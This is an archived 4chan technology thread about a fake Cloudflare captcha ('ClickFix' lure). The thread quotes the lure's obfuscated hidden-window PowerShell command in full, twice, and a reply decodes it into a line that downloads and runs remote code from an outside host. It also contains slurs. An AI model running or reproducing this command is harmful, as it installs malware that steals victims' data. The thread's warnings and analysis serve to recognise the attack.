[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: file.png (41 KB, 827x717)
41 KB PNG
I just got this shit.
I wants me to run this crap
powershell start powershell -wi h '-En JgAoACgAWwBzAHQAcgBpAG4AZwBdAFsAcwB0AHIAaQBuAGcAXQApAFsAMwBdACsAJwBlAHgAJwApACgAaQByAG0AIAB6AGMAYQBsAHQAbwBuAC4AYwBvAG0ALwBiADIALgB0AHgAdAApAA==';I am human - ID 2d3152es 


I am not executing that script faggot.png
>>
>>109622603
top jej cloudflare starting to infect its users
>>
>>109622611
I do not even think that is the real cloud flare.
Did they change their logo on top?
>>
File: Dokuro-chan.gif (36 KB, 200x200)
36 KB GIF
Someone reverse engineer that and tell me what it does
>>
>>109622635
&(([string][string])[3]+'ex')(irm zcalton.com/b2.txt)

now, the real question is what awful dogshit does that shitty website have.
>>
>>109622635
It obviously launches power shell (a big NO NO) with -wi h ???? and I think the rest is code in HEX or some shit for obfuscation.
>>
>>109622603
>>109622646
I got this captch on https://batcave.biz/ for your information.
>>
>>109622635
ClickFix attacks are almost always infostealers
>>
>>109622656
you should totally give the chinese whatever the fuck this 300kb of text is I swear it's not a virus.

https://archive.is/sxaV8

totally not a massive fucking risk (after bouncing from b2.txt -> b1.txt)
>>
>>109622659
>almost alway
so you're telling there's a chance
>>
>>109622611
>>109622635
Another proof that viruses are fake and you need to enter lot of shit to get infected by malware.
>>
>>109622664
Now I am curious to run that shit in a VM to see what will happen!
>>
>>109622668
yeah there's a chance it's a different type of virus like a RAT
>>
>>109622656
https://tria.ge/260822-z5mxaszbka/behavioral1#:~:text=Replay%20Monitor

got nothing.
>>
Cloudflare itself looks very shady. This only looks twice as shady as the real Cloudflare.
>>
>>109622603
that's not CF you boomer mongrel, it's known fishing attack holy shit, everywhere but /g/, get out
>>
i ain't clicking any of these
>>
>>109622759
>>109622603
https://tria.ge/260822-1pq5fsvtew/behavioral1#:~:text=Replay%20Monitor

nothing happened?
>>
Here's an AIslop analysis:
https://grok.com/share/c2hhcmQtNQ_f4049437-6e26-4b98-82a6-1d22c41eab83
It correctly found the payload (an msi installer) but I haven't dug any deeper beyond uploading it to Virustotal.
>>
I tried to run it for you but something went wrong.

powershell start powershell -wi h '-En JgAoACgAWwBzAHQAcgBpAG4AZwBdAFsAcwB0AHIAaQBuAGcAXQApAFsAMwBdACsAJwBlAHgAJwApACgAaQByAG0AIAB6AGMAYQBsAHQAbwBuAC4AYwBvAG0ALwBiADIALgB0AHgAdAApAA==';I am human - ID 2d3152es
bash: powershell: command not found
bash: I: command not found
>>
so simple and genius!
>>
Look up "clickfix"

This is the type of malware delivery you're seeing here.
>>
>>109622603
you thought it was a good idea reposting a malware script?
>>
File: 1780545315625417.png (207 KB, 949x980)
207 KB PNG
>>109622603
>>
imagine being so retarded you fall for a malware campaign and make a post about it on the basket weaving forum.
>>
>>109623621
isn't it the purpose of this website
>>
>>109623292
>I tried to run it but something went wrong.
nothing unusual, normal lunix experience



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.